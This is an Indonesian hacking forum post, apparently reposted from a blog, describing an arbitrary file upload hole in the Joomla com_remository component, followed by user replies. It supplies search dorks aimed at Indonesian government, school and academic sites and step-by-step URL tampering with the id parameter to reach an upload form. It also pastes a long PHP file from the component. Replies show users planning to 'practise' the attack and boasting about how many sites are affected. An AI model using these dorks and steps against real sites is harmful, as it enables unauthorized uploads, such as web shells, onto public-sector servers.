Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability

<< Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability
<< Author : Z190T
<< Contact : mahruz[dot]id[at]gmail[dot]com
<< Homepage : http://mahruz-id.com/
<< Vendor : http://remository.com/downloads/
<< d0rk :
- inurl:"func=addfile" <-- Organisation, School, Academic and Government of Indonesian Site
- inurl:"/func,addfile/" <-- Organisation, School, Academic and Government of Indonesian Site
- inurl:"index.php?option=com_remository" <-- free!!
<< File Allowed : Any File Extension
<< Try 0n : any OS
<< readme.

Sebelumnya,, saya hanya ingin memberi tau satu hal penting about pentingnya berhati2 memilih plugin atau componen web baik itu pada Joomla, Wordpress, Drupal atau yang lainnya. ndak penting preview website yang kita bangun itu bagus, preview bagus ndak menjamin keamanan suatu website, yang terpenting adalah bagaimana website yang kita miliki terlihat simple dengan dukungan sistem keamanan di atas rata-rata.

Saya akan memberi tahu satu dari sekian banyak kelemahan component pada Joomla, yaitu Repository. Repository yang dimaksud di sini adalah acuan bahan atau file download yang disediakan secara terbuka untuk user, admin dan bahkan untuk semua pengunjung.

Remository adalah nama perubahan untuk Repository yang ada pada Joomla, entahlah,,, saya juga ndak mengerti, kenapa harus pkek nama Remository??

bodo amat!!.
udah ah,, kelamaan baca tulisan saya yang salbut!! langsung saja...

<< Untuk d0rk [inurl:"func=addfile"] dan [inurl:"index.php?option=com_remository"]
Contoh :
http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=15

“You have no permitted upload categories - please refer to the webmaster”

Disana kita bisa melihat, kita tidak mempunyai izin untuk upload data dengan identitas 15 pada bagian 46, hanya Admin yang di perbolehkan untuk upload data ke area tersebut, lantas,,, bagaimana caranya supaya kita bisa upload data ke area tersebut? Ooo,,,, tidak bissaa…!! ß hanya orang bodoh yang mengatakan hal itu!. kita manipulasikan data yang akan kita masukkan!!, Let’s do it!!

Pada bagian ItemId ndak usah dirubah, yang kita rubah hanya id nya saja. inject-inject dikit supaya table uploadnya keluar!! ^_^

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=1

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=2

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=3

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=4

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=5

dan seterusnya.. sampai keluar croot-nya!! heheheheee….
Kalo bosen nginject, langsung patokin saja di angka tertinggi,, misalnya,,

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=99

tpi,, klo misalnya kita dapat di..

http://localhost/index.php?option=com_remository&Itemid=46&func=addfile&id=8

langsung dah upload!!, jangan lupa,, isi formnya,, supaya mudah mencari directory hasil uploadnya.

All Done!

Please Note: All Uploads will be reviewed prior to Publishing.

Yes!! kita berhasil!!
Pada bagian pencarian hasil upload ini yang menurut saya agak sulit soalnya file yang udah kita upload udah melalui converter pada bagian ../remositoryAdminDbonvert.php
isinya seperti ini..

Code:: <?php

class remositoryAdminDbconvert extends remositoryAdminControllers {

function remositoryAdminDbconvert ($admin) {
remositoryAdminControllers::remositoryAdminControllers ($admin);
$_REQUEST['act'] = 'dbconvert';
}

function listTask () {
$view =& new remositoryAdminHTML ($this, 0, '');
$view->formStart(_DOWN_ADMIN_ACT_DBCONVERT);
$interface =& remositoryInterface::getInstance();
$database =& $interface->getDB();
foreach (array('containers','files','reviews','structure','log','temp') as $tablename) {
$sql = "TRUNCATE TABLE #__downloads_$tablename";
remositoryRepository::doSQL($sql);
}
$sql = "ALTER TABLE #__downloads_containers AUTO_INCREMENT=2";
remositoryRepository::doSQL($sql);
$containermap = array('catid'=>array(),'folderid'=>array());
$sql = "SELECT * FROM #__downloads_category";
$database->setQuery($sql);
$rows = $database->loadObjectList();
if (!$rows) $rows = array();
foreach ($rows as $row) {
if ($row->registered) $row->registered = '0';
else $row->registered = '2';
foreach ($row as $field=>$value) {
if (!is_numeric($row->$field)) $row->$field = $database->getEscaped($row->$field);
}
$sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES (0,'$row->name',$row->published,'$row->description',$row->files,'$row->icon',$row->registered)";
$database->setQuery($sql);
if (!$database->query()) {
echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
exit();
}
$newid = $database->insertid();
$containermap['catid'][$row->id] = $newid;
$sql = "SELECT * FROM #__downloads_folders WHERE catid=$row->id";
$database->setQuery($sql);
$folders = $database->loadObjectList();
if ($folders) {
foreach ($folders as $folder) $this->convertfolder ($folder, $newid, $containermap);
}
}
$sql = "SELECT * FROM #__downloads";
$database->setQuery($sql);
$files = $database->loadObjectList();
if (!$files) $files = array();
foreach ($files as $file) {
$testurl = strtolower(trim($file->url));
$findsite = strpos($testurl, strtolower(trim($interface->getCfg('live_site'))));
if ($findsite===false){
$islocal = '0';
$realname = '';
$filedate = date('Y-m-d');
$url = $file->url;
if (eregi(_REMOSITORY_REGEXP_URL,$url) OR eregi(_REMOSITORY_REGEXP_IP,$url)) $filefound = true;
else $filefound = false;
}
else {
$islocal = '1';
$url_array=explode('/',$file->url);
$url = '';
$realname = $url_array[(count($url_array)-1)];
$filepath = $this->repository->Down_Path.'/'.$realname;
if (file_exists($filepath)) {
$filefound = true;
$filedate = date('Y-m-d', filemtime($this->repository->Down_Path.'/'.$realname));
}
else $filefound = false;
}
$containerid = 0;
if ($file->catid != 0) {
if (isset($containermap['catid'][$file->catid])) $containerid = $containermap['catid'][$file->catid];
else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->catid.'</td></tr>';
}
if ($file->folderid != 0) {
if (isset($containermap['folderid'][$file->folderid])) $containerid = $containermap['folderid'][$file->folderid];
else echo '<tr><td>'.$file->id.'/'.$realname.'/'.$file->folderid.'</td></tr>';
}
if ($filefound AND $containerid != 0) {
foreach (get_class_vars(get_class($file)) as $field=>$value) if (is_string($file->$field)) $file->$field = $database->getEscaped($file->$field);
$sql="INSERT INTO #__downloads_files (realname,islocal,containerid,published,url,description,smalldesc,autoshort,license,licenseagree,filetitle,filesize,filetype,downloads,icon,fileversion,fileauthor,filedate,filehomepage,screenurl,submittedby,submitdate) VALUES ('$realname',$islocal,$containerid,$file->published,'$url','$file->description','$file->smalldesc',$file->autoshort,'$file->license',$file->licenseagree,'$file->filename','$file->filesize','$file->filetype','$file->downloads','$file->icon','$file->fileversion','$file->fileauthor','$filedate','$file->filehomepage','$file->screenurl', $file->submittedby,'$file->submitdate')";
$database->setQuery($sql);
if (!$database->query()) {
echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
exit();
}
$newid = $database->insertid();
$sql = "SELECT * FROM #__downloads_comments WHERE id=$file->id";
$database->setQuery($sql);
$comments = $database->loadObjectList();
if ($comments) {
foreach ($comments as $comment) {
$sql = "INSERT INTO #__downloads_reviews (component,itemid,userid,title,comment,date) VALUES ('com_remository',$newid,'$comment->userid','Review Title','$comment->comment','$comment->time')";
$database->setQuery($sql);
remositoryRepository::doSQL($sql);
}
}
}
else echo '<tr><td>'.$file->url.'</td></tr>';
}
$this->repository->resetCounts(array());
echo '<tr><td class="message">'._DOWN_DB_CONVERT_OK.'</td></tr>';
echo '</table></form>';
}

function convertfolder ($folder, $parent, &$containermap) {
$interface =& remositoryInterface::getInstance();
$database =& $interface->getDB();
foreach ($folder as $field=>$value) {
if (!is_numeric($folder->$field)) $folder->$field = $database->getEscaped($folder->$field);
}
if ($folder->registered) $folder->registered = '0';
else $folder->registered = '2';
$sql = "INSERT INTO #__downloads_containers (parentid,name,published,description,filecount,icon,registered) VALUES ($parent, '$folder->name', $folder->published, '$folder->description', '$folder->files', '$folder->icon', $folder->registered)";
$database->setQuery($sql);
if (!$database->query()) {
echo "<script> alert('".$database->getErrorMsg()."'); window.history.go(-1); </script>\n";
exit();
}
$newid = $database->insertid();
$containermap['folderid'][$folder->id] = $newid;
$sql = "SELECT * FROM #__downloads_folders WHERE parentid=$folder->id";
$database->setQuery($sql);
$children = $database->loadObjectList();
if ($children) {
foreach ($children as $child) convertfolder ($child, $newid, $containermap);
}
}

}

?>

Silahkan kamu deskripsikan sendiri!! ^_^ heheheee....

<< Untuk d0rk [inurl:"/func,addfile/"]

Contoh :

http://localhost/index.php/downloads/func-addfile/
cara inject-nya ndak jauh beda,, hanya menambahkan /id/(angka). misalnya..
http://localhost/index.php/downloads/func-addfile/id/99

<< hasil.

Spoiler:

ukeh... saya kira cukup sampai di sini, sampai jumpa brother... ^_^
source : http://mahruz-id.com/id/2012/04/func-addfile/

ijin praktek...
bang... baru baru nih... Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability 3529815765

yg baru yg baru Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability 772168924

iyah...!! itu baru omz!! baru beberapa hari ini ditemukan ketidak beresan-nya!! Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability 3529815765

masih gresh gk bugnya?

wedew banyak yang kena :bahak:

badewei thx om :minta:

masih perawan ting2 tuh omz..!! masih belum saya share di exploit-db!!. kemaren tanggal 4 april baru ketemu!! "menurut saya" Joomla Component -> com_remository -> Arbitrary File Upload Vulnerability 3529815765

itu kayany hampir sama kaya spaw ya bang

sepertinya mirip omz,,, tpi lebih yang ini lebih simple omz...!!

ijin praktekin bang mahruz :sukro:

ane ijin nyimak gan :belajar:

» Joomla Component Jobprofile SQL Injection Vulnerability
» Joomla Component com_sar_news SQL Injection vulnerability
» Joomla component (com_easyfaq) SQL injection vulnerability
» Joomla Component Jobprofile SQL Injection Vulnerability
» Joomla Component com_dms Remote SQL injection vulnerability - (category_id)